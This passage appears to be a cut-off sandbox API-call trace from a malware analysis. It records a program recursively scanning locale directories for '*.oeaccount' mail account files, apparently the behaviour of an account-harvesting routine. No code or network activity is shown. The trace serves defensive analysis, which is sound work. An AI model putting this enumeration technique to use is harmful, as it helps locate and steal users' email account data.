FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.587] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.587] strcmp (_Str1="ar-SA", _Str2="..") returned 1 [0252.587] strcmp (_Str1="ar-SA", _Str2=".") returned 1 [0252.587] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0252.587] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0252.587] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0252.587] FindFirstFileA (in: lpFileName="ar-SA\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0252.705] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0252.705] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0252.705] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0252.705] FindFirstFileA (in: lpFileName="ar-SA\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24eae0 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] strcmp (_Str1=".", _Str2="..") returned -1 [0252.706] strcmp (_Str1=".", _Str2=".") returned 0 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] strcmp (_Str1="..", _Str2="..") returned 0 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.706] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.706] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.707] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.707] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.707] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.707] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.707] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0252.707] FindClose (in: hFindFile=0x24eae0 | out: hFindFile=0x24eae0) returned 1 [0252.707] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.707] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.707] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.707] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.707] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.707] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.707] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.708] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.708] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.709] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.709] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.710] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.710] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.711] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.711] strcmp (_Str1="bg-BG", _Str2="..") returned 1 [0252.711] strcmp (_Str1="bg-BG", _Str2=".") returned 1 [0252.711] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0252.711] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0252.711] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0252.711] FindFirstFileA (in: lpFileName="bg-BG\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0253.034] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0253.034] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0253.034] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0253.034] FindFirstFileA (in: lpFileName="bg-BG\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24e7a0 [0253.035] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] strcmp (_Str1=".", _Str2="..") returned -1 [0253.035] strcmp (_Str1=".", _Str2=".") returned 0 [0253.035] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.035] _mbscpy 